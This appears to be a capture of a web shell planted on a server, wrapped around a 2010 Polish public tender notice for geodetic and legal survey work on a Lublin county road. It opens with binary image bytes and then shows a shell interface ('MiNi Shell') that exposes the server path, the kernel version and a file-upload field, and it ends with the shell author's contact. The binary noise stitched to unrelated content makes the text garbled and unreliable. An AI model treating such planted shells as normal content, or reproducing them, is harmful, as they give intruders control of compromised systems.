JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100730/231892-N-2010.html

<p class="kh_header"><b>Lublin: Sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego nieruchomości zajętych pod drogę powiatową nr 2107L o przebiegu Lublin - Głusk - Wilczopole - Kliny - Wierzchowiska od km 6+030 (skrzyżowanie z drogą powiatową nr 2109L o przebiegu Kliny - Majdan Mętowski - Bystrzejowice) do km 7+883 (granica lasu)</b><br>
<b>Numer ogłoszenia: 231892 - 2010; data zamieszczenia: 30.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lubelski , ul. Spokojna 9, 20-074 Lublin, woj. lubelskie, tel. 081 5326009, faks 081 5347373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego nieruchomości zajętych pod drogę powiatową nr 2107L o przebiegu Lublin - Głusk - Wilczopole - Kliny - Wierzchowiska od km 6+030 (skrzyżowanie z drogą powiatową nr 2109L o przebiegu Kliny - Majdan Mętowski - Bystrzejowice) do km 7+883 (granica lasu).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia:

Przedmiotem zamówienia jest sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego nieruchomości zajętych pod drogę powiatową nr 2107L o przebiegu Lublin - Głusk -Wilczopole - Kliny - Wierzchowiska od km 6+030 (skrzyżowanie z drogą powiatową nr 2109L o  przebiegu Kliny - Majdan Mętowski - Bystrzejowice) do km 7+883 (granica lasu)
zgodnie z poniższym opisem:

A.Materiały wyjściowe  
Oznaczenie wg CPV: 70000000-1 Usługi w zakresie nieruchomości.
W celu prawidłowego przygotowania oferty należy bezwzględnie zapoznać się ze wszystkimi dokumentami znajdującymi się we właściwym Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej i właściwym organie prowadzącym ewidencję gruntów oraz właściwym sądzie prowadzącym księgi wieczyste, w części  dotyczącej tego opracowania.

B.Ogólne wymagania dotyczące prac:
Opracowywana dokumentacja geodezyjna powinna odpowiadać w szczególności wymogom: 
1) ustawy z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz. U. z 2007 r., Nr 19, poz. 115 z poźn. zm.) art. 34, art. 51,
2) ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2005 r., Nr 240, poz. 2027 z późn. zm.),
3) ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. Dz. U. z 2010 r., Nr 102, poz. 651),
4) rozporządzenia Rady Ministrów z 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz. U. Nr 268, poz. 2663),
5) rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29.03.2001 r. w sprawie ewidencji gruntów i budynków (Dz. U. Nr 38, poz. 454),
6) rozporządzenia Ministrów Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki Żywnościowej z dnia 14 kwietnia 1999 r. w sprawie rozgraniczania nieruchomości (Dz.U. Nr 45, poz. 453),
7) ustawy z dnia 6 lipca 1982 r. o księgach wieczystych i hipotece (t.j. Dz. U. z 2001 r.,  Nr 124, poz. 1361, z późn. zm.),
8) właściwego miejscowo Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej, oraz w zależności od powziętych ustaleń wymogom: 
9) ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r., Nr 133, poz. 872 późn. zm.) art.73, 60.

C.  Zakres opracowania i skład dokumentacji dla Zamawiającego:
I. Ustalenie granic pasa drogowego w oparciu o stan faktyczny na gruncie oraz zgodnie z przepisami art. 34 w/w ustawy o drogach publicznych.
II. W zależności od powziętych ustaleń:
1. W przypadku zajęcia na dzień 31.12.1998 r. przez pas drogowy działek osób fizycznych i prawnych należy dokonać:
a) podziału tych działek i sporządzić mapy projektu podziału oddzielnie dla każdej nieruchomości podlegającej podziałowi, opatrzone stosowną pieczęcią PODG i K, zgodnie z przepisami ww rozporządzenia Rady Ministrów z 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości - 4 egz., z klauzulą - na mapie uwzględniono stan zajęcia na dzień 31 grudnia 1998 r..
b) celem potwierdzenia zajęcia nieruchomości na podstawie art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r., Nr 133, poz. 872 późn. zm.) należy dołączyć co najmniej jeden z poniżej wymienionych dokumentów lub inny dokument potwierdzający zajęcie nieruchomości:
- umowy zawarte przed dniem 31 grudnia 1998 r., dotyczące urządzenia, utrzymania lub modernizacji drogi;
- rachunki, faktury za wykonanie w/w prac zlecanych przez zarządcę drogi;
- oświadczenie zarządcy drogi jako dowód na władanie nieruchomością w przypadku braku innych dokumentów , z którego winno jednoznacznie wynikać w jakim okresie i jakie konkretnie czynności były podejmowane w ramach ww władania;
-  dowód z zeznań świadków, którymi mogą być pracownicy firm świadczących usługi w zakresie modernizacji, utrzymania i ochrony dróg, z których wynikać będzie zakres prowadzonych na nieruchomości prac na dzień 31.12.1998 r.;
- dowód z zeznań właścicieli nieruchomości zajętej pod drogę oraz właścicieli nieruchomości sąsiednich,   
c) sporządzenia protokołu z ustalenia zajęcia części działki pod drogę z wyszczególnieniem elementów pasa drogowego oraz z danymi właściciela - dokładny adres (w przypadku zamieszkania na wsi - nr domu). Protokół winien być podpisany przez właściciela nieruchomości, Wykonawcę oraz przedstawiciela Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach obecnych podczas czynności okazania granic, a w przypadku stwierdzenia zajęcia przez pas drogowy działek osób fizycznych i prawnych zgodnie z art. 51 ust.1 pkt 2 ustawy z dnia 21 marca 1985 r. o drogach publicznych (t.j. z 2004 r. Dz. U. Nr 204, poz. 2086, z późn. zm.) należy niezależnie od powyższego dołączyć oświadczenie np. wójta, sołtysa lub właściciela nieruchomości, potwierdzające zajęcie pod pas drogowy nieruchomości wydzielonych z działek osób fizycznych lub prawnych zgodnie ze wzorem oświadczenia stanowiącego załącznik nr 3 do SIWZ.

III. Badanie stanu prawnego dzielonych działek i załączenie dokumentów własności do nieruchomości dzielonych, w przypadku gdy istnieje:
-KW - badanie hipoteczne 4-ech działów, a w przypadku gdy nabycie nieruchomości przez obecnego właściciela nastąpiło po dacie 31.12.1998 r. należy dodatkowo uzyskać akt notarialny z nabycia.
-Akt Własności Ziemi, z klauzulą prawomocności, poświadczony za zgodność z oryginałem przez organ wydający - 2 egz. + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
-Umowa przekazania gospodarstwa rolnego oraz z tytuł własności na poprzedniego właściciela + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
-Inne dokumenty stwierdzające tytuł prawny do nieruchomości dzielonych (decyzje, umowy użytkowania wieczystego, itp.) poświadczone za zgodność z oryginałem - 2 egz. + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
W przypadku gdy właściciel nie żyje i brak jest postępowania spadkowego należy załączyć: 
- dokumenty własności na nieżyjącego właściciela,
- wykaz domniemanych spadkobierców, ich adresy zamieszkania, telefony,
-W przypadku nieuregulowanego stanu prawnego nieruchomości należy załączyć:
- pismo z właściwego organu prowadzącego ewidencję gruntów i budynków, że dla danej nieruchomości brak jest dokumentów własności,
- uzyskanie z właściwego miejscowo sądu Wydziału Ksiąg Wieczystych zaświadczenia, że dla danej nieruchomości nie jest prowadzona księga wieczysta ani zbiór dokumentów.
Uwaga:
1. Na mapie projektu podziału, dla działki zajętej pod pas drogowy należy w pozycji: użytki wpisać dr.
2. W przypadku różnic w numerach i powierzchniach działek pomiędzy obowiązującą ewidencją a dokumentami własności, należy na mapie projektu podziału zamieścić stosowne klauzule lub wykonać wykaz synchronizacyjny - wykaz zmian gruntowych.
IV. Sporządzenie mapy orientacyjnej z przebiegu drogi dla danego zadania - 2 egz.
V. Sporządzenie mapy regulacji pasa drogi powiatowej 2107L o przebiegu Lublin - Głusk - Wilczopole - Kliny - Wierzchowiska od km 6+030 do km 7+883 w układzie wstęgowym, z naniesionymi podziałami działek, zawierającej zarówno elementy mapy ewidencyjnej tj. granice, numery działek, numery posesji, tytuł prawny do nieruchomości jak i elementy mapy sytuacyjnej (jezdnia, chodnik, rowy, skarpy, drzewa oraz inne urządzenia na stałe związane z pasem drogowym) w skali odpowiednio dostosowanej - 4 egz. 
VI. Kopie protokołów granicznych opatrzone stosowną pieczęcią PODG i K - 2 egz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych  (tj. Dz. U. z 2010 r. Nr 113, poz. 759) dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4) sytuacji ekonomicznej i finansowej
oraz wykazali brak podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy.
Opis sposobu dokonania oceny spełniania warunków udziału w postępowaniu:
na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii w zakresie rozgraniczania i podziału nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych wydane zgodnie z odnośnymi przepisami obowiązującymi w miejscu zamieszkania lub siedziby (w Polsce: nadane przez Głównego Geodetę Kraju w zakresie określonym w art. 43 pkt 2 ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2005 r. Nr 240, poz. 2027 z późn. zm.)).

Ocena spełnienia warunków zostanie przeprowadzona w oparciu o przedłożone dokumenty opisane w punkcie 8 niniejszego ogłoszenia, które będą sprawdzane pod względem zgodności z prawem oraz kompletności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz oświadczeń lub dokumentów jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
- W celu wykazania  spełnienia przez Wykonawcę  warunków określonych w art. 22 ust. 1 ustawy, których opis sposobu spełniania został dokonany w ogłoszeniu o zamówieniu oraz w cz. 9 SIWZ, Wykonawca składa:
1) oświadczenie, że spełnia warunki dotyczące:
a)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)posiadania  wiedzy i doświadczenia,
c)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d)	sytuacji ekonomicznej i finansowej,
w zakresie opisanym przez Zamawiającego, którego wzór stanowi załącznik Nr 1 do formularza ofertowego,
2) oświadczenie, że osoby, które będą uczestniczyły w wykonywaniu zamówienia, posiadają  uprawnienia wymagane odnośnymi przepisami (w Polsce: w/w ustawą - Prawo geodezyjne i kartograficzne), którego wzór stanowi załącznik Nr 4 do formularza ofertowego.

Jeżeli Wykonawca polega na  wiedzy i doświadczeniu lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

- W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą  oświadczenie o braku podstaw do wykluczenia, którego wzór stanowi załącznik Nr 2 do formularza ofertowego.
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów ww. oświadczenia wykazujących brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.

Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej Wykonawców w rozumieniu art. 23 ww. ustawy; w przypadku złożenia oferty wspólnej każdy z Wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 (przedkładając oświadczenie, którego wzór stanowi załącznik Nr 1 do formularza ofertowego, w zakresie opisanym przez Zamawiającego i dotyczącym spełniania przez siebie określonego warunku) oraz brak podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia w okolicznościach określonych w art. 24 ust. 1 ustawy (przedkładając oświadczenie, którego wzór stanowi załącznik Nr 2 do formularza ofertowego); wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie; Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/powiatlublin/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Starostwie Powiatowym w Lublinie przy ul. Spokojnej 9 (Wydział Inwestycji i Funduszy Pomocowych, II piętro, pokój nr 201) lub pobrać ze strony internetowej www.bip.lublin.pl/powiatlublin/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2010 godzina 09:00, miejsce: w Starostwie Powiatowym w Lublinie przy ul. Spokojnej 9 (Wydział Inwestycji i Funduszy Pomocowych, II piętro, pokój nr 201).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.12.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com